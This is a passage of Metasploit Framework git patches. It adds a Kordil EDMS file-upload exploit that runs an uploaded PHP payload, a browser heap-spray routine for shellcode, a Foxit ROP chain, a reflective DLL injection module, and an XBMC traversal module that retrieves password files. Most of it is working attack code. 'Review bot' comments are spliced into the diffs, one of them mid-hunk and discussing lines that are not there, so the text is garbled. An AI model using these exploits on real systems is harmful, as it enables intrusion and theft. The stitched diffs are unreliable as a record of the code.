- it "should set and return 
raw_headers" do - pending "#set_raw_headers() doesn't seem to actually do anything" - end - - it "should set and return a formatted header" do - pending :set_formatted_header - end + it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) it "should respond to its various accessors" do cli.should respond_to :config From 1913d60d650a7b6d39c3ee0131be22d04a76aae5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 21 Feb 2013 01:13:25 +0100 Subject: [PATCH 041/139] multibrowser support --- .../multi/browser/java_jre17_jmxbean_2.rb | 19 +++++++++++++++---- 1 file changed, 15 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index c448bf968a..e8534ede40 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -122,10 +122,21 @@ class Metasploit3 < Msf::Exploit::Remote end def generate_html - html = %Q|Loading, Please Wait...| - html += %Q|
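Review bot: The new one-liner for "should set and return the content-type header" passes `excuse_lazy(:set_cookie_header)`, the same symbol as the cookie example directly above it, so its pending message names the wrong method; the replaced block had the same slip, but this rewrite is the moment to point it at the content-type setter (its real name is not visible in this hunk). The blank line between the cookie and content-type examples was also dropped while every other pair keeps one, so restoring it after `it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header)` keeps the list uniform. The `@@ -124` hunk ends at `cli.should respond_to :config`; the describe block continues outside it.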

Loading, Please Wait...

| - html += %Q|| - html += %Q|| + html = <<-EOF + + + + EOF return html end From f04df6300a916cd77c6f99d0680a0960a3dbfcdb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 21 Feb 2013 13:44:37 +0100 Subject: [PATCH 042/139] makefile updated --- external/source/exploits/cve-2013-0431/Makefile | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/cve-2013-0431/Makefile b/external/source/exploits/cve-2013-0431/Makefile index 7c77a9c3b4..43045c9e5a 100644 --- a/external/source/exploits/cve-2013-0431/Makefile +++ b/external/source/exploits/cve-2013-0431/Makefile @@ -2,17 +2,21 @@ CLASSES = \ Exploit.java \ - B.java + B.java \ + Serializer.java .SUFFIXES: .java .class .java.class: - javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java all: $(CLASSES:.java=.class) install: + java Serializer mv Exploit.class ../../../../data/exploits/cve-2013-0431/ mv B.class ../../../../data/exploits/cve-2013-0431/ + mv Exploit.ser ../../../../data/exploits/cve-2013-0431/ clean: rm -rf *.class + rm -rf *.ser From e5e47a34851912b24e7974549918e06735f26593 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 21 Feb 2013 10:10:39 -0600 Subject: [PATCH 043/139] Bleh, I fucked up this file --- .../browser/foxit_reader_plugin_url_bof.rb | 31 ------------------- 1 file changed, 31 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index fd2d342952..79df79fbcf 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb 
@@ -96,46 +96,16 @@ class Metasploit3 < Msf::Exploit::Remote return rand_text_alpha(4).unpack("L")[0].to_i end -<<<<<<< HEAD -======= def nops make_nops(4).unpack("N*") end ->>>>>>> ee707904b08d61c2cb240ef8d052fef9e3d2c87d # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) def win7_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ -<<<<<<< HEAD - 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] - 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] - 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] - 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] - junk, # Filler (RETN offset compensation) - 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] - 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00001000, # 0x00001000-> edx - 0x1000d9ec, # XOR EDX, EDX # RETN - 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] - jun, # Filler (compensate) - 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] - junk, # Filler (RETN offset compensation) - junk, # Filler (RETN offset compensation) - junk, # Filler (RETN offset compensation) - junk, # Filler (RETN offset compensation) - 0x00000040, # 0x00000040-> ecx - 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00000001, # 0x00000001-> ebx - 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] - 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] - 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x90909090, # nop - 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] -======= 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] 
@@ -161,7 +131,6 @@ class Metasploit3 < Msf::Exploit::Remote 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] nops, 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] ->>>>>>> ee707904b08d61c2cb240ef8d052fef9e3d2c87d ].flatten.pack("V*") return rop_gadgets From 4784db3403bfefaa8e83e38c8d70cabf99f372d0 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Thu, 21 Feb 2013 15:48:41 -0500 Subject: [PATCH 044/139] Fixed name --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 2f43b36077..099b8f28a9 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary [ 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton 'Lucas "acidgen" Lundgren IOActive', - 'Matt "hostess" Andreko', + 'Matt "hostess" Andreko ' ], 'References' => [ From b4f002d080642ad98b44322cb026c017ab52e6cd Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Thu, 21 Feb 2013 16:55:27 -0500 Subject: [PATCH 045/139] Code Review Feedback Modified USER and PASS to USERNAME and PASSWORD Moved the Scanner mixin to the bottom and removed deregister --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 099b8f28a9..561f91c892 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -9,9 +9,9 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, 
@@ -41,11 +41,9 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(8080), OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), OptInt.new('DEPTH', [true, 'The max traversal depth', 9]), - OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']), - OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']), + OptString.new('USERNAME', [true, 'The username to use for the HTTP server', 'xbmc']), + OptString.new('PASSWORD', [true, 'The password to use for the HTTP server', 'xbmc']), ], self.class) - - deregister_options('RHOST') end def run_host(ip) From 002654317ce99555dcf6298a543f6a4d94970398 Mon Sep 17 00:00:00 2001 From: bcoles Date: Fri, 22 Feb 2013 23:32:17 +1030 Subject: [PATCH 046/139] Add Kordil EDMS File Upload Vulnerability exploit --- .../multi/http/kordil-edms-upload-exec.rb | 137 ++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 modules/exploits/multi/http/kordil-edms-upload-exec.rb diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil-edms-upload-exec.rb new file mode 100644 index 0000000000..d4caccb78b --- /dev/null +++ b/modules/exploits/multi/http/kordil-edms-upload-exec.rb 
@@ -0,0 +1,137 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability", + 'Description' => %q{ + This module exploits a vulnerability in Kordil EDMS v2.2.60rc3. + This application has an upload feature that allows an unauthenticated user + to upload arbitrary files to the '/kordil_edms/userpictures/' directory. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Brendan Coles ' # Discovery and exploit + ], + 'References' => + [ + #['OSVDB', ''], + #['EDB', ''], + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 22 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']), + ], self.class) + end + + def check + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + peer = "#{rhost}:#{rport}" + + # retrieve software version from login page + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}global_group_login.php" + }) + if res and res.code == 200 + if res.body =~ /
Kordil EDMS v2\.2\.60/ + return Exploit::CheckCode::Vulnerable + elsif res.body =~ /Kordil EDMS v/ + return Exploit::CheckCode::Detected + end + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def upload(base, file) + data = Rex::MIME::Message.new + data.add_part(file, 'text/x-php', nil, "form-data; name=\"upload_fd31\"; filename=\"#{@fname}.php\"") + data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd0"') + data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd27"') + data.add_part("n", nil, nil, 'form-data; name="act"') + data_post = data.to_s + data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}users_add.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data_post + }) + return res + end + + def on_new_session(client) + if client.type == "meterpreter" + client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") + client.fs.file.rm("#{@fname}.php") + else + client.shell_command_token("rm #{@fname}.php") + end + end + + + def exploit + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + @peer = "#{rhost}:#{rport}" + @fname = rand_text_numeric(7) + + # upload PHP payload to userpictures/[fname].php + print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + php = %Q|| + begin + res = upload(base, php) + if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ + print_good("#{@peer} - File uploaded successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + # retrieve and 
execute PHP payload + print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)") + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}userpictures/#{@fname}.php" + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end +end From 56fa5ead37cb1be772290423ed9c8ec8de889d62 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 22 Feb 2013 10:21:20 -0600 Subject: [PATCH 047/139] Initial version of js_property_spray --- lib/msf/core/exploit/http/server.rb | 52 +++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 326ae2fd6a..3afeb25000 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb 
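Review bot: `base << '/'` in both `check` and `exploit` appends to the string returned by `target_uri.path` in place; if that accessor returns the underlying object rather than a copy, a second call sees an already-modified path, so `base = target_uri.path.dup` (or `base += '/'`) is safer. In `exploit`, the `res` from the final GET of `userpictures/#{@fname}.php` is assigned but never inspected, so an unexpected status after a successful upload is not reported; either check `res.code` or drop the assignment. Style point: `if res and res.code == 302 and ...` relies on the low-precedence `and`; `&&` is the idiomatic form for boolean conditions in Ruby.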
@@ -792,6 +792,58 @@ protected return js end + # + # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) + # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's + # publication on "DEPS – Precise Heap Spray on Firefox and IE10". + # + def js_property_spray + js = %Q|function sprayHeap(shellcode, browser, offset, heapBlockSize, maxAllocs) { + if (offset == undefined) { offset = 0x104; } + if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } + if (maxAllocs == undefined) { maxAllocs = 500; } + if (browser == undefined) { browser = 'generic'; } + + var div_container = document.createElement("div"); + div_container.style.cssText = "display:none"; + var data; + junk = unescape("%u2020%u2020"); + while (junk.length < 0x1000) junk += junk; + + data = junk.substring(0,offset) + shellcode; + data += junk.substring(0,0x800-offset-shellcode.length); + + while (data.length < 0x80000) data += data; + + for (var i = 0; i < maxAllocs; i++) + { + var obj = document.createElement("button"); + switch (browser) + { + case 'ie8': + obj.title = data.substring(0,(heapBlockSize-0x58)/2); + div_container.appendChild(obj); + break; + + case 'ie9': + obj.title = data.substring(0,(heapBlockSize-2)/2); + div_container.appendChild(obj); + break; + + case 'ie10': + obj.title = data.substring(0,(heapBlockSize-2/2) / 2); + div_container.appendChild(obj); + break; + + default: + obj.title = data.substring(0, heapBlockSize); + div_container.appendChild(obj); + } + } + } + | + end + def js_heap_spray js = %Q|var memory = new Array(); function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) { From 0ea7247a43713b10fe8ec8fe65661eb332b134d9 Mon Sep 17 00:00:00 2001 
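Review bot: In the `ie10` branch, `(heapBlockSize-2/2) / 2` evaluates `2/2` first, so the expression is `(heapBlockSize-1)/2`; the `ie9` branch next to it uses `(heapBlockSize-2)/2`, which presumably was intended here too. `junk = unescape("%u2020%u2020");` has no `var`, so it leaks into the page as an implicit global; declare it `var junk = unescape("%u2020%u2020");`. The method's value is the `js` string from the assignment on its first line, which is easy to miss in a 50-line body; ending with an explicit `js` (the preceding method's `return js` style) would make the contract visible.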
From: Meatballs Date: Fri, 22 Feb 2013 22:05:29 +0000 Subject: [PATCH 048/139] Initial commit --- .../windows/manage/reflective_dll_inject.rb | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 modules/post/windows/manage/reflective_dll_inject.rb diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb new file mode 100644 index 0000000000..15e0492006 --- /dev/null +++ b/modules/post/windows/manage/reflective_dll_inject.rb 
@@ -0,0 +1,98 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ + This module will inject into the memory of a process a specified Reflective DLL. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + )) + + register_options( + [ + OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']), + OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']), + ], self.class) + end + + # Run Method for when run command is issued + def run + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + dll = '' + offset = nil + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end + + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end + + inject_into_pid(dll, datastore['PID'], offset) + end + + def inject_into_pid(pay, pid, offset) + + if offset.nil? + print_error("Reflective Loader offset is nil.") + return + end + + if pay.nil? or pay.empty? + print_error("Invalid DLL.") + return + end + + if pid.nil? 
or pid == 0 + print_error("Invalid PID.") + return + end + + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") + begin + print_status("Opening process #{pid}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + print_status("Generating payload") + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) + # Ensure memory is set for execution + host_process.memory.protect(mem) + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, pay) + host_process.thread.create(mem+offset, 0) + print_good("Successfully injected payload in to process: #{pid}") + rescue ::Exception => e + print_error("Failed to Inject Payload to #{pid}!") + print_error(e.to_s) + end + end +end + From 15d505f7a9b4367f08a8d1592846f8e00d3a4bf1 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Feb 2013 22:09:19 +0000 Subject: [PATCH 049/139] Msftidy --- .../windows/manage/reflective_dll_inject.rb | 44 +++++++++---------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index 15e0492006..ac7d447afe 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb 
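Review bot: `raise "Can't find an exported ReflectiveLoader function!" if offset == 0` can never fire because `offset` starts as `nil` and is only ever assigned from `rva_to_file_offset`, so the missing-export case falls through to `inject_into_pid` and is reported there as a nil offset; test `offset.nil?` inside the `begin` block instead. `print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")` reads an option that is not registered (the option is `PATH`), so the message prints an empty name. `rescue ::Exception => e` in `inject_into_pid` also swallows `Interrupt` and `SystemExit`; `rescue ::StandardError => e` is the safe form. The allocation size `pay.length + (pay.length % 1024)` does not round up to a multiple of 1024; if that was the intent, `(pay.length + 1023) & ~1023` does, and a comment should say why the extra room is wanted.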
@@ -12,15 +12,15 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] )) register_options( @@ -37,23 +37,23 @@ class Metasploit3 < Msf::Post dll = '' offset = nil - begin - File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end - end + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 - rescue - print_error( "Failed to read and parse Dll file: #{$!}" ) - return - end + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end inject_into_pid(dll, datastore['PID'], offset) end 
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post print_error("Invalid PID.") return end - + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") begin print_status("Opening process #{pid}") From aa007b9e0ab4a873075427bfd733d6787ca750f7 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 22 Feb 2013 20:07:16 -0600 Subject: [PATCH 050/139] Updates --- lib/msf/core/exploit/http/server.rb | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 3afeb25000..5fdfaf77ff 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -795,10 +795,10 @@ protected # # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's - # publication on "DEPS – Precise Heap Spray on Firefox and IE10". + # publication on "DEPS – Precise Heap Spray on Firefox and IE10" # def js_property_spray - js = %Q|function sprayHeap(shellcode, browser, offset, heapBlockSize, maxAllocs) { + js = %Q|function sprayHeap(shellcode, browser, heapBlockSize, offset , maxAllocs) { if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } if (maxAllocs == undefined) { maxAllocs = 500; } @@ -808,7 +808,7 @@ protected div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); - while (junk.length < 0x1000) junk += junk; + while (junk.length < offset+0x1000) junk += junk; data = junk.substring(0,offset) + shellcode; data += junk.substring(0,0x800-offset-shellcode.length); @@ -821,7 +821,7 @@ protected switch (browser) { case 'ie8': - obj.title = data.substring(0,(heapBlockSize-0x58)/2); + obj.title = data.substring(0,(heapBlockSize-6)/2); div_container.appendChild(obj); break; 
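Review bot: The first hunk of the `server.rb` change rewrites the `sprayHeap` signature to `(shellcode, browser, heapBlockSize, offset , maxAllocs)`, swapping the third and fourth positional parameters relative to the previous version, so any caller that passed `offset` third now silently sets `heapBlockSize` instead; if the reorder is intended, the comment above `js_property_spray` should document the argument order, and the stray space in `offset ,` should go. The `ie8` constant change from `0x58` to `6` in the third hunk has no comment explaining what the 6 bytes account for, which makes the value impossible to verify later; a short `// header size for this browser` note next to it would help.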
@@ -835,9 +835,13 @@ protected div_container.appendChild(obj); break; - default: + case 'generic': obj.title = data.substring(0, heapBlockSize); div_container.appendChild(obj); + break; + + default: + throw "Invalid argument"; } } } From 7509501b18d3ba4aacb34d168da905c0ad74e6fc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 08:46:51 -0600 Subject: [PATCH 051/139] Adding a go_pro command --- lib/msf/ui/console/command_dispatcher/core.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index b1deb09058..2a7abf765b 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -68,6 +68,9 @@ class Core @@search_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ]) + @@go_pro_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner." ]) + # The list of data store elements that cannot be set when in defanged # mode. DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ] @@ -82,6 +85,7 @@ class Core "connect" => "Communicate with a host", "color" => "Toggle color", "exit" => "Exit the console", + "go_pro" => "Launch Metasploit web UI", "help" => "Help menu", "info" => "Displays information about one or more module", "irb" => "Drop into irb scripting mode", @@ -2575,6 +2579,17 @@ class Core return res end + def cmd_go_pro_help + print_line "Usage: go_pro" + print_line + print_line "Launch the Metasploit web UI" + print_line + end + + def cmd_go_pro(*args) + print_line "Hey now it's pro time" + end + protected # From 67c2c3da205a39a73a3c7981facc60105aa2ffee Mon Sep 17 00:00:00 2001 
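Review bot: `throw "Invalid argument";` in the new `default` branch throws a bare string, which carries no stack trace and cannot be distinguished by type by a caller; `throw new Error("Invalid argument: browser=" + browser);` reports what was rejected. Because `browser` is defaulted to `'generic'` earlier in the function, this branch is reached only for an explicitly unsupported value, which is worth stating in the comment above `js_property_spray`.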
From: Matt Andreko Date: Sat, 23 Feb 2013 10:09:23 -0500 Subject: [PATCH 052/139] Code Review Feedback Fixed the USER/PASS that I missed in last review Converted from Scanner module to Gather --- .../auxiliary/{scanner/http => gather}/xbmc_traversal.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) rename modules/auxiliary/{scanner/http => gather}/xbmc_traversal.rb (95%) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb similarity index 95% rename from modules/auxiliary/scanner/http/xbmc_traversal.rb rename to modules/auxiliary/gather/xbmc_traversal.rb index 561f91c892..55c4a76a68 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -11,7 +11,6 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, @@ -46,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - def run_host(ip) + def run # No point to continue if no filename is specified if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty? print_error("Please supply the name of the file you want to download") @@ -58,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", - 'basic_auth' => "#{datastore['USER']}:#{datastore['PASS']}" + 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" }, 25) # Show data if needed @@ -70,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary path = store_loot( 'xbmc.http', 'application/octet-stream', - ip, + datastore['RHOST'], res.body, fname ) From 2af930f1ff45e27f6fe1b684ecf8634b5cd7139b Mon Sep 17 00:00:00 2001 
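Review bot: In the last hunk, `store_loot` now receives `datastore['RHOST']` for the host, while `Msf::Exploit::Remote::HttpClient` (still included in the first hunk) provides the `rhost` helper for exactly this value; using `rhost` keeps the module consistent with the rest of the HttpClient-based code and survives changes to how the target is resolved. With `run_host(ip)` renamed to `run`, this is the only place that still needs a host value. `run` continues outside the hunk.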
From: Tod Beardsley Date: Sat, 23 Feb 2013 09:19:27 -0600 Subject: [PATCH 053/139] Adds msfbase_dir, switches on apt existance --- lib/msf/ui/console/command_dispatcher/core.rb | 34 +++++++++++++++++-- 1 file changed, 31 insertions(+), 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 2a7abf765b..9390939b03 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -85,7 +85,7 @@ class Core "connect" => "Communicate with a host", "color" => "Toggle color", "exit" => "Exit the console", - "go_pro" => "Launch Metasploit web UI", + "go_pro" => "Launch Metasploit web GUI", "help" => "Help menu", "info" => "Displays information about one or more module", "irb" => "Drop into irb scripting mode", @@ -137,6 +137,17 @@ class Core "Core" end + # Indicates the base dir where Metasploit Framework is installed. + def msfbase_dir + base = __FILE__ + while File.symlink?(base) + base = File.expand_path(File.readlink(base), File.dirname(base)) + end + File.expand_path( + File.join(File.dirname(base), "..","..","..","..","..") + ) + end + def cmd_color_help print_line "Usage: color <'true'|'false'|'auto'>" print_line @@ -2582,12 +2593,29 @@ class Core def cmd_go_pro_help print_line "Usage: go_pro" print_line - print_line "Launch the Metasploit web UI" + print_line "Launch the Metasploit web GUI" print_line end def cmd_go_pro(*args) - print_line "Hey now it's pro time" + unless is_apt + print_line " This command is only available on apt-based installations," + print_line " such as Kali Linux." + return false + end + @@go_pro_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + cmd_go_pro_help + return false + end + end + return true + end + + # Determines if this is an apt-based install + def is_apt + File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) end protected 
